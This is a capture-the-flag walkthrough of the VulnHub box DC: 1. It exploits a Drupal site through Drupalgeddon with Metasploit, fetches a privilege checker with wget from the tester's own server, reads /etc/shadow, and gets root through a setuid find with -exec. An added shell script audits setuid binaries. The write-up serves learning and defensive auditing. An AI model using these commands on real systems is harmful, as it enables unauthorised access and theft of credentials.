This VulnHub walkthrough is a box called DC: 1. It’s rated as a beginner box and it’s really not too difficult.
We start off by running our typical nmap scan: nmap -sC -sV -v 192.168.136.132 -oN map1
There are a few ports listed here but the most interesting one is port 80. Let’s look at the website.
Ok, it’s a Drupal site, which confirms what Nmap found. Nmap also noted that the version was 7. Let’s see if we can find a more exact version. I’ll use droopescan: droopescan scan drupal -u 192.168.136.132
It takes a few minutes to run, but it gives us a list of possible versions between 7.22 and 7.26. Let’s see if any exploits exist.
Searchsploit returns a ton of results most of which center around the Drupalgeddon exploits. I successfully exploited the site with three of the exploits: 34992.py, 44449.rb, and a Metasploit module.
For this walkthrough, I’m just going to show the Metasploit route. I’ll have a video walkthrough up soon where I’ll show all three ways. The privilege escalation is the same either way.
So let’s start up Metasploit and search for drupal.
Next, we’ll set rhosts to the site’s IP address.
Now, we’ll launch the exploit to get a shell.
Now that we have a shell, we can work on privilege escalation. There are a couple of ways to discover the path: by running a Linux privilege checker, or by finding a hint (in the form of a flag) on the Drupal site.
I’ll use the checker for this walkthrough. So start up a python web server and use wget to download the file. I also upgraded the shell using python.
python -c 'import pty; pty.spawn("/bin/bash")'
python -m SimpleHTTPServer 80
wget 192.168.136.129/privcheck.py
Then run the checker script.
The hard part about doing it this way is that it’s really easy to miss it in the checker’s output. You also might not know that find has an -exec flag that lets you run commands on what you find.
The other way to find this would be to get the mysql password from the Drupal config, find the user password hashes, and crack them. That would lead you back to the Drupal site, where you could find the hint.
All that to say, the find command has the suid bit set, which will let us execute code as the owner – in this case root.
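Since a noisy privilege checker makes a setuid find easy to overlook, here is an added audit script (not part of the original walkthrough) that lists setuid files under a tree and reports any whose name is not on an expected baseline; the ALLOWLIST is an assumed, constructed baseline, not taken from the box.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: audit a filesystem tree for
# setuid binaries and report any not on an expected allowlist. On a box like
# DC: 1, /usr/bin/find would show up as unexpected, since find's -exec lets the
# setuid owner's privileges run arbitrary commands.
# ALLOWLIST is an assumed, constructed baseline; tune it to your distribution.

ALLOWLIST="passwd su sudo mount umount ping newgrp chsh chfn gpasswd"

# list_suid ROOT: print every regular file under ROOT with the setuid bit set.
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# unexpected_suid ROOT: print setuid files whose basename is not in ALLOWLIST.
unexpected_suid() {
    list_suid "$1" | while IFS= read -r path; do
        name=$(basename "$path")
        case " $ALLOWLIST " in
            *" $name "*) ;;                # expected setuid binary; skip it
            *) printf '%s\n' "$path" ;;    # not on the baseline; report it
        esac
    done
}

# When run with a directory argument, audit that tree (e.g. sh suid_audit.sh /).
if [ $# -gt 0 ]; then
    unexpected_suid "$1"
fi
```

Run it as a normal user; setuid bits are visible without root, so this works from the same low-privilege shell the walkthrough lands in.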
Let’s test it out.
find /etc/shadow -exec cat {} +
If you only had a webshell at this point, you could crack the password for the flag4 user account and log in with ssh. That’s not necessary to get root or even to view the root flag. Find can do all that for us. (I’m still using /etc/shadow here because something has to fill the spot; it really doesn’t matter what. An empty text file would work too.)
find /etc/shadow -exec bash \;
Hmmmm … what happened here? We should have been root. Let’s try it again with sh.
Now we’re root! But why didn’t it work with bash? Let’s find out.
So it looks like running bash will actually put you in a restricted bash shell. That’s not the case with sh.
Anyway, we can now go to the root folder and view the flag.
So that was DC: 1 from VulnHub. I hope you enjoyed the walkthrough. I’ll have a video up soon that walks through the other methods to get a shell.
Update: The video can be found here
Happy Hacking!
-R3a50n